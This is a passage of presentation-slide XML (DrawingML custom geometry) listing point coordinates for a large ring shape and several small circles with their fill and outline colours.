                    <a:pt x="345528" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210947" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211679" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213864" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217479" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222503" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228914" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236691" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245813" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256259" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268007" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281035" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295323" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310848" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327590" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345528" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364639" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384903" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406298" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428802" y="952500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452395" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477055" y="876300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502760" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529490" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557223" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585937" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615611" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646224" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677754" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710181" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743482" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777637" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812623" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="848420" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885006" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922360" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960460" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999286" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1038815" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079027" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161412" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1203542" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1468111" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513971" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560278" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1654148" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701669" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2554060" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2513633" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2472615" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431024" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388875" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125204" y="38100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079618" y="25400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1797434" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844955" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985132" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2295561" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="431800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="520700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="876300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="914400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="952500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="1041400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="1206500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="1244600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="1333500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288156" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3287424" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3285239" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281624" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3276600" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270189" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3262412" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3253290" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3242844" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3231096" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3218068" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3203780" y="2247900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3188255" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3171513" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3153575" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134464" y="2412999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114200" y="2463799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092805" y="2501899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070301" y="2539999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3046708" y="2578099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3022048" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2996343" y="2654299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969613" y="2679699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2941880" y="2717799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2913166" y="2755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883492" y="2793999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2852879" y="2819399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821349" y="2857499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2788922" y="2882899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2755621" y="2908299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2721466" y="2946399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2686480" y="2971799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650683" y="2997199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614097" y="3022599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2576743" y="3047999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2538643" y="3073399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499817" y="3086099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2460288" y="3111499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420076" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2379204" y="3149599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2337691" y="3174999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2252834" y="3200399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030992" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985132" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938825" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1892092" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1844955" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="3289300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="3263900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="3238499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="3213099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="3187699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="3162299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="3136899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="3111499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="3073399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="3047999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="3022599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="2984499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="2959099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="2920999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="2882899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="2857499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="2819399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="2781299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="2743199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="2705099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="2666999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="2590799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="2552699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="2476499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="2425699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="2387599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="2349499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="2298700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="2260600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="2171700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1981200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1892300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1841500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1790700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3499104" y="1752600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498454" y="1701800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496518" y="1651000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3493312" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3488851" y="1562100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3483153" y="1511300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3476235" y="1460500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3468112" y="1422400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3458802" y="1371600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448320" y="1320800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3436685" y="1282700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423911" y="1231900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3410017" y="1193800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3395017" y="1155700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3378930" y="1104900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3361771" y="1066800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343557" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3324305" y="977900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3304031" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3282752" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260485" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237245" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213050" y="787400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187917" y="749300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3161861" y="711200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134899" y="673100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107048" y="647700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078325" y="609600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048746" y="571500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018328" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2987087" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955040" y="482600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2922203" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2888594" y="419100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2854228" y="393700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819122" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2783293" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2746757" y="304800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709532" y="279400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2671632" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2633076" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593880" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2573970" y="203200"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1511915" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465496" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033607" y="25400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1987188" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="3499484" h="3492500">
                  <a:moveTo>
                    <a:pt x="1893192" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1605911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1558725" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940378" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893192" y="0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572216" y="3957032"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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572216" y="3957032"/>
              <a:ext cx="379730" cy="379730"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="379729">
                  <a:moveTo>
                    <a:pt x="324772" y="54770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="352158" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379543" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370414" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352158" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="379543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="370414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="352158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="324772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="290255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="251683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="210679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="168864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="127859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="9128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="27385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="54770"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="DDEAF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572216" y="6285771"/>
              <a:ext cx="379730" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="379729" h="381000">
                  <a:moveTo>
                    <a:pt x="210679" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168864" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="9159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="27478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="54957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="89630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="128347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="169490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9128" y="252584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27385" y="291301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54770" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89288" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127859" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168864" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210679" y="380932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251683" y="371773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290255" y="353453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324772" y="325975"/>
                  </a:lnTo>
                  <a:lnTo>
